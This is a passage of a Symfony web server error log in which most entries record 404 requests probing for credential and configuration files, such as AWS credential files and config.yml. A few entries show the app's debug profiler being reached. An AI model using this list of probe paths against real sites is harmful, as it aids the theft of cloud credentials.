  8004. [2025-12-20 20:09:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8005. [2025-12-20 20:09:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws/access.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws/access.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8006. [2025-12-20 20:09:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws/index.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws/index.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8007. [2025-12-20 20:09:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws/s3.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws/s3.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8008. [2025-12-20 20:09:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws/s3.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws/s3.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8009. [2025-12-20 20:10:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /awsKEY.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /awsKEY.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8010. [2025-12-20 20:10:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /awsS3.util.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /awsS3.util.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8011. [2025-12-20 20:10:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws_config.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws_config.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8012. [2025-12-20 20:10:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws_cred.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws_cred.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8013. [2025-12-20 20:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws_credentials.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws_credentials.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8014. [2025-12-20 20:10:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws_ec2.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws_ec2.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8015. [2025-12-20 20:10:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /awsconfig.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /awsconfig.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8016. [2025-12-20 20:11:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/config/default.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/config/default.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8017. [2025-12-20 20:11:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/config/development.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/config/development.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8018. [2025-12-20 20:12:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8019. [2025-12-20 20:13:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8020. [2025-12-20 20:13:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bundleconfig.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bundleconfig.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8021. [2025-12-20 20:13:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /circle.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /circle.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8022. [2025-12-20 20:13:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /compose.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /compose.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8023. [2025-12-20 20:13:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8024. [2025-12-20 20:13:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/application.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/application.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8025. [2025-12-20 20:13:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/aws.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/aws.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8026. [2025-12-20 20:13:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/aws.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/aws.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8027. [2025-12-20 20:13:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/conf.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/conf.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8028. [2025-12-20 20:14:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/config.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/config.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8029. [2025-12-20 20:14:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/monitor.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/monitor.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8030. [2025-12-20 20:14:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/s3.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/s3.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8031. [2025-12-20 20:14:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=twig","method":"GET"} []
  8032. [2025-12-20 20:14:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  8033. [2025-12-20 20:14:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8034. [2025-12-20 20:14:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.prod.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.prod.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8035. [2025-12-20 20:14:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8036. [2025-12-20 20:14:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8037. [2025-12-20 20:15:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8038. [2025-12-20 20:15:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8039. [2025-12-20 20:15:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c80c7d","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c80c7d?panel=time","method":"GET"} []
  8040. [2025-12-20 20:15:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  8041. [2025-12-20 20:15:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/application.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/application.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8042. [2025-12-20 20:16:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/aws.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/aws.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8043. [2025-12-20 20:16:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/aws.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/aws.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8044. [2025-12-20 20:16:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/base.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/base.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8045. [2025-12-20 20:17:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/config.exs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/config.exs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8046. [2025-12-20 20:17:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/config.ino"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/config.ino\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8047. [2025-12-20 20:17:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8048. [2025-12-20 20:17:44] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"cc2d11","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/cc2d11/search/results?ip=74.7.242.57&limit=10","method":"GET"} []
  8049. [2025-12-20 20:17:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=74.7.242.57&limit=10","method":"GET"} []
  8050. [2025-12-20 20:18:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/daemon.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/daemon.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
